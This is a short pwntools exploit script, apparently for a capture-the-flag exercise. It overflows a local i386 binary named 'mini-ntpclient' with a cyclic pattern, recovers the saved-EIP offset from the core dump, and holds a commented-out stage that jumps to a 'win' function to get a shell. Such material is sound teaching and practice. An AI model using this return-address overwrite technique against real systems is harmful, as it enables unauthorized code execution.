from pwn import *
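context(arch='i386', os='linux')

BINARY = './mini-ntpclient'

# Generate a cyclic pattern so that we can auto-find the offset.
# cyclic() emits a De Bruijn sequence: every 4-byte window occurs at exactly
# one position, so cyclic_find() can turn the faulting EIP back into an offset.
payload = cyclic(400)

# Run the process once so that it crashes.  The payload goes in as a single
# argv element (list form, no shell), so there is no quoting to worry about;
# it must not contain NUL bytes, and cyclic() output never does.
io = process([BINARY, payload])
io.wait()

# Get the core dump.  io.corefile resolves where the kernel actually wrote it
# (honouring /proc/sys/kernel/core_pattern) instead of assuming './core'.
# Core dumps must be enabled in this shell first:  ulimit -c unlimited
core = io.corefile

# Our cyclic pattern should have been used as the crashing address.
# Not a bare `assert`: that is stripped under `python -O`, and a failure here
# should say *what* EIP held so the payload size can be adjusted.
offset = cyclic_find(core.eip)   # -1 if EIP is not a window of the pattern
if offset < 0:
    raise RuntimeError(
        'eip=%#x is not part of the cyclic pattern; the overflow may not '
        'reach the saved return address with a 400-byte payload' % core.eip)
log.success('saved EIP is overwritten at offset %d', offset)

# Cool! Now let's just replace that value with the address of 'win'.
# Next stage, still disabled.  NOTE: this target is i386, so the register is
# core.eip, not core.rip -- the offset computed above is reused directly.
#crash = ELF(BINARY)
#payload = fit({
#    offset: crash.symbols['win']
#})
#
# Get a shell!
#io = process([BINARY, payload])
#io.sendline(b'id')
#print(io.recvline())
# uid=1000(user) gid=1000(user) groups=1000(user)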